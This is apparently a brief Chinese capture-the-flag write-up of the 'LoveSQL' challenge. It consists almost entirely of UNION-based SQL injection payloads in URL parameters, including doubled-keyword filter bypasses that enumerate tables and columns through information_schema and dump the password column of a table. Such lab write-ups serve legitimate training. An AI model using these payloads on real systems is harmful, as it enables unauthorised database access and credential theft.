做完了baby sql來到了love sql發現這個注入相比baby sql容易的多
我們還是像baby sql中注入方式一樣
於是構造pyload: ?username=admin&password=admin' union select 1,2,3%23
兩個回顯位
於是就爆數據表:?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23
再爆表字段:?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23
爆數據:?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23
於是一次love sql注入就完成了